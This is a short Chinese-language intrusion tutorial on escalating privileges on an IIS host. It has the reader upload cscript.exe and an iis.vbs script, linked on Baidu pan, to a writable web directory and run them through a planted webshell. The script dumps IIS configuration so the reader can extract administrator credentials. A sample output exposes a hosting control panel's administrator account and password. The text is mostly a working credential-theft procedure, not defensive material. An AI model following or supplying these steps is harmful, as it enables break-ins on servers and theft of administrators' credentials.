渗透提权之读取IIS文件密码
利用工具:cscript.exe
iis.vbs: https://pan.baidu.com/s/1ntBwtZj
把这两个工具上传到网站可读可写目录里,然后用大马执行cmd命令
CMD命令1:"C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cscript.exe" d:\freehost\cagj\web\iis.vbs
然后就出现一堆回显,然后自己在里面找管理员账号密码就OK了!
如:
7i24虚拟主机管理平台受控端 administrator asdadmin :80:sys.avzhan.com C:\WINDOWS\7i24.com\FreeHost
账户:administrator
密码:asdadmin
--------------------------------------------------------------------------------------------
